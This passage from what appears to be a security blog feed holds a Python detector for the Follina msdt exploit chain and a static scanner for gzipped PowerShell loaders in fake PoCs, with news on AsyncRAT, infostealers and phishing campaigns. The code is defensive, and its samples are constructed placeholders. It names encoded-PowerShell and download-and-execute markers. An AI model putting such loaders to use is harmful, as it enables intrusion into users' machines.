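{"EventID": 1, "ProcessGuid": "{W-0001}", "ParentProcessGuid": "{E-0000}", "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "\"WINWORD.EXE\" /n \"C:\\Users\\alice\\Downloads\\salary-review.docx\""}
{"EventID": 1, "ProcessGuid": "{M-0002}", "ParentProcessGuid": "{W-0001}", "Image": "C:\\Windows\\System32\\msdt.exe", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "CommandLine": "\"C:\\Windows\\System32\\msdt.exe\" ms-msdt:/id CONSTRUCTED-DIAGNOSTIC-ID"}
{"EventID": 1, "ProcessGuid": "{S-0003}", "ParentProcessGuid": "{M-0002}", "Image": "C:\\Windows\\System32\\sdiagnhost.exe", "ParentImage": "C:\\Windows\\System32\\msdt.exe", "CommandLine": "C:\\Windows\\System32\\sdiagnhost.exe -Embedding"}
{"EventID": 1, "ProcessGuid": "{P-0004}", "ParentProcessGuid": "{S-0003}", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\System32\\sdiagnhost.exe", "CommandLine": "powershell.exe -NoProfile -EncodedCommand CONSTRUCTED-BASE64"}
{"EventID": 1, "ProcessGuid": "{M-0005}", "ParentProcessGuid": "{E-0000}", "Image": "C:\\Windows\\System32\\msdt.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "\"C:\\Windows\\System32\\msdt.exe\" -id CONSTRUCTED-TROUBLESHOOTER"}
"""


def load_events(jsonl: str) -> List[Dict]:
    """Parse one JSON object per non-empty line."""
    return [json.loads(line) for line in jsonl.splitlines() if line.strip()]


def image_name(path: str) -> str:
    """Executable file name, lower-cased, from a full Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(event: Dict, by_guid: Dict[str, Dict]) -> List[str]:
    """Follow ParentProcessGuid links; returns [oldest known ancestor, ..., this process]."""
    chain = [image_name(event["Image"])]
    seen = {event["ProcessGuid"]}
    parent = by_guid.get(event.get("ParentProcessGuid"))
    while parent is not None and parent["ProcessGuid"] not in seen:
        chain.append(image_name(parent["Image"]))
        seen.add(parent["ProcessGuid"])
        parent = by_guid.get(parent.get("ParentProcessGuid"))
    return list(reversed(chain))


def detect(events: List[Dict]) -> List[Dict]:
    """Apply the Follina rules; each alert names the rule, the process GUID and its chain."""
    by_guid = {e["ProcessGuid"]: e for e in events}
    alerts = []
    for e in events:
        img = image_name(e["Image"])
        parent = image_name(e.get("ParentImage", ""))
        cmd = e.get("CommandLine", "").lower()
        chain = ancestry(e, by_guid)

        def alert(rule: str) -> None:
            alerts.append({"rule": rule, "guid": e["ProcessGuid"], "chain": " -> ".join(chain)})

        # Single-edge rules: each fires even when only part of the chain was logged.
        if img == "msdt.exe" and parent in OFFICE_PROCESSES:
            alert("office_spawns_msdt")
        if img == "msdt.exe" and "ms-msdt:" in cmd:
            alert("msdt_protocol_handler")
        if parent == "sdiagnhost.exe" and img in SCRIPT_HOSTS:
            alert("sdiagnhost_spawns_script_host")
        # Full-chain rule: Office -> msdt.exe -> sdiagnhost.exe -> script host.
        if (img in SCRIPT_HOSTS and "sdiagnhost.exe" in chain and "msdt.exe" in chain
                and any(p in OFFICE_PROCESSES for p in chain)):
            alert("follina_chain")
    return alerts


if __name__ == "__main__":
    for a in detect(load_events(SAMPLE_LOG)):
        print(f"{a['rule']:32} {a['guid']:10} {a['chain']}")
```

The single-edge rules are what you would deploy on an EDR that only gives you one event at a time; the `follina_chain` rule needs the GUID links but produces a far lower false-positive rate, since a user opening the Windows troubleshooter (the fifth sample line) touches msdt.exe without any Office parent or ms-msdt: scheme. Microsoft’s published workaround for the bug disabled the ms-msdt protocol handler by deleting its HKEY_CLASSES_ROOT\ms-msdt registry key after backing it up, which removes exactly the edge the `msdt_protocol_handler` rule watches for.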

AsyncRAT and Browser Infostealer via Follina Vulnerability

It has been observed that threat actors deployed a diverse range of payloads in successful exploitation instances. One instance involved deploying the remote access Trojan AsyncRAT, complete with a valid digital signature.


Upon execution, this trojan checks whether antivirus software is present. Its primary function, however, is to gather system information, such as operating system details, the path it was executed from, usernames and hardware identifiers, and transmit it to a command-and-control (C&C) server.


Once its task is complete, the malware awaits further commands from the C&C server and executes them on the compromised system.

Another payload instance was a browser infostealer, targeting various browser data such as saved login credentials and cookies from browsers like Edge, Chrome, and Firefox.

Patching the Follina Vulnerability

While most exploits of the vulnerability occur through malicious documents, researchers have discovered alternative methods enabling successful Follina exploitation, including manipulation of HTML content in network traffic.

“While the malicious document approach is highly concerning, the less documented methods by which the exploit can be triggered are troubling until patched,” said Tom Hegel, senior threat researcher at security firm SentinelOne. “I would expect opportunistic and targeted threat actors to use this vulnerability in a variety of ways when the option is available—it’s just too easy.”

The Follina flaw was initially noticed in August 2020 by an undergraduate researcher and reported to Microsoft on April 21. The company has proposed mitigations, including using Microsoft Defender Antivirus for monitoring and blocking exploitation and disabling a specific protocol within the Support Diagnostic Tool.


Microsoft acknowledged that the vulnerability has been exploited and has already patched the issue. However, the company is yet to classify the vulnerability as a ‘zero-day’ or previously unknown vulnerability.

APT actors utilizing the vulnerability

More alarmingly, the Follina vulnerability has been observed as part of longer infection chains. For example, security firm Proofpoint observed the Chinese APT actor TA413 sending emails impersonating the Central Tibetan Administration that carried malicious URLs.

The vulnerability has been employed at different stages in threat actor infection chains, depending on the tactics and toolkits used.


It has been used against numerous targets in Nepal, Belarus, the Philippines, India, and Russia. Proofpoint’s vice president of threat research, Sherrod DeGrippo, identified multiple instances of vulnerability exploitation within phishing campaigns.

The vulnerability affects all supported Windows versions, Office ProPlus, Office 2021, Office 2013 through 2019, and Microsoft Office 365, receiving a 7.8 CVSS score.

Government workers impacted by the vulnerability

In addition to targeting various entities across different countries, specialists report attacks on government workers leveraging this vulnerability.

State-sponsored hackers attempted to exploit the Follina vulnerability in Microsoft Office against U.S. and E.U. government targets through a phishing campaign.

So far, researchers have not identified which government was behind the attack.

Image: Emails sent in a phishing campaign to government workers

The malicious emails of the phishing campaign contained fake recruitment pitches promising a 20 percent salary increase. To learn more, recipients were urged to open the accompanying attachment.

Sherrod DeGrippo, vice president of threat research at Proofpoint, tweeted about a similar incident in which about 10 of the company’s customers received over 1,000 messages with the same text.

Fake Exploits Used to Deliver Cobalt Strike Beacons
https://gridinsoft.com/blogs/cobalt-strike-beacons/
Wed, 25 May 2022 22:43:08 +0000

Cyble experts have warned that cybercriminals are attacking information security researchers, distributing malware under the guise of exploits for Windows that eventually installs Cobalt Strike beacons on the researchers’ machines.

Let me remind you that we also wrote that Emotet now installs Cobalt Strike beacons.

Cyble analysts report that malware disguised as PoC exploits for a pair of Windows vulnerabilities (CVE-2022-24500 and CVE-2022-26809), which Microsoft patched as part of the April Patch Tuesday, recently appeared on GitHub.

“Upon investigation, we discovered that it’s malware disguised as an Exploit. Similarly, we found a malicious sample that appears to be a fake POC of CVE-2022-24500. Both the malicious samples were available on GitHub. Interestingly both repositories belong to the same profile, indicating the possibility that Threat Actor (TA) might be hosting a malware campaign targeting Infosec Community,” Cyble analysts reported.


Fake exploits were published in the repositories of the user rkxxz, which have now been deleted along with the account itself. As always happens after the publication of PoC exploits, the news quickly spread on Twitter and even attracted the attention of attackers on hacker forums.


You might also be curious to know that cybersecurity experts have analyzed the methods of the Russian hacker group Wizard Spider.

And it soon became clear that the exploits were in fact fake and were installing Cobalt Strike beacons on people’s devices. Cyble analysts took a closer look at the fake PoCs and found that they are written in .NET and only pretend to attack the supplied IP address, while in fact infecting the user with a backdoor.


The deobfuscated sample showed that the fake PoC runs a PowerShell script, which in turn executes another, gzip-compressed PowerShell script (VirusTotal) that injects the beacon into memory.
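The loader pattern just described, a .NET program carrying a base64 blob that decodes to a gzip-compressed PowerShell script, can be checked for statically before anyone runs a “PoC”. The following Python is an added example, not Cyble’s tooling or the original post’s code: it scans a source file for long base64 runs, decodes and gunzips them, and reports any that contain PowerShell loader markers. The sample “PoC” source is constructed inside the block and the embedded script is harmless.

```python
"""Static triage of a suspicious "PoC": find embedded base64 blobs, try to
gunzip them and report anything that looks like a PowerShell stage.

Added example, not code from the original post or from Cyble. The sample
source is constructed: a skeleton of a .NET console program carrying a
gzip-compressed, base64-encoded PowerShell one-liner, mirroring the loader
pattern the post describes. RunPowerShell is a hypothetical helper name.
"""
import base64
import binascii
import gzip
import re
import zlib
from typing import Dict, List

# Long runs of base64 characters; anything shorter is unlikely to be a payload.
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

# Lower-case strings that indicate a decoded blob is a PowerShell stage.
PS_MARKERS = ("invoke-expression", "iex ", "frombase64string", "-encodedcommand",
              "-enc ", "downloadstring", "gzipstream", "memorystream")


def build_sample_source() -> str:
    """Constructed fake PoC source carrying a gzipped PowerShell stage."""
    inner = "Invoke-Expression 'Write-Output constructed-sample'"  # harmless
    blob = base64.b64encode(gzip.compress(inner.encode(), mtime=0)).decode()
    return (
        '// constructed C# "PoC" skeleton, not a real exploit\n'
        "static void Main(string[] args) {\n"
        "    string target = args[0];           // the IP the PoC claims to attack\n"
        f'    string stage = "{blob}";\n'
        "    RunPowerShell(stage);              // hypothetical helper\n"
        "}\n"
    )


def decode_blob(blob: str):
    """Base64-decode, gunzip when the gzip magic is present; returns (text, was_gzip)."""
    raw = base64.b64decode(blob, validate=True)
    was_gzip = raw[:2] == b"\x1f\x8b"
    if was_gzip:
        raw = gzip.decompress(raw)
    return raw.decode("utf-8", errors="replace"), was_gzip


def triage(source: str) -> List[Dict]:
    """Return one finding per embedded blob that decodes to PowerShell-like text."""
    findings = []
    for m in B64_RE.finditer(source):
        try:
            text, was_gzip = decode_blob(m.group(0))
        except (binascii.Error, ValueError, OSError, EOFError, zlib.error):
            continue  # not valid base64, or not valid gzip: ignore
        lowered = text.lower()
        markers = [k for k in PS_MARKERS if k in lowered]
        if markers:
            findings.append({"offset": m.start(), "gzip": was_gzip,
                             "markers": markers, "preview": text[:80]})
    return findings


if __name__ == "__main__":
    for f in triage(build_sample_source()):
        print(f"offset {f['offset']}: gzip={f['gzip']} markers={f['markers']}")
        print("  decoded:", f["preview"])
```

The decoded stage is only previewed, never executed; the point is that a “PoC” claiming to exploit a remote host has no business carrying an encoded PowerShell loader, and that fact is visible without running anything.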

The researchers note that this is not the first case of targeted attacks on cybersecurity experts. The fact is that by attacking members of the cybersecurity community, in theory, attackers not only gain access to data on vulnerability research (which the victim can work on), but can also gain access to the network of a cybersecurity company. And this can be a real gold mine for hackers.

Cobalt Strike is a legitimate commercial tool built for pentesters and red teams and focused on post-exploitation operations. Unfortunately, it has long been a favorite of attackers ranging from state-sponsored APT groups to ransomware operators.

Although the tool is not available to ordinary users, attackers still find ways to use it (for example, rely on old, pirated, hacked and unregistered versions).
